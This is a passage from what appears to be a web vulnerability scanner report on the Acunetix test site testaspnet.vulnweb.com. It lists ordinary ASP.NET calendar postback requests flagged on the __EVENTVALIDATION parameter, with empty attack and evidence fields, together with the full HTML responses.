href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1061 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,061 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8386&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMAHpMHf2ghkZGRqcXbaBojxK1fiDSNMozj46HOLzw%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK%2F35LoCAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJnyLA7byFn5hdnjzIZQKwBxUC6P
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:36:23 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMAHpMHf2ghkZGRqcXbaBojxK1fiDSNMozj46HOLzw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK/35LoCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJnyLA7byFn5hdnjzIZQKwBxUC6P" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:White" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8157&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAb7POK9oIZGRkzk1l6dZPbfALct1SPgbvSM5ajfw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK%2F39PGCQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPNF6RRGp0a8Eq4sK7f7Ylg27zkNc%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:00:58 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAb7POK9oIZGRkzk1l6dZPbfALct1SPgbvSM5ajfw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK/39PGCQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPNF6RRGp0a8Eq4sK7f7Ylg27zkNc=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:White" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a 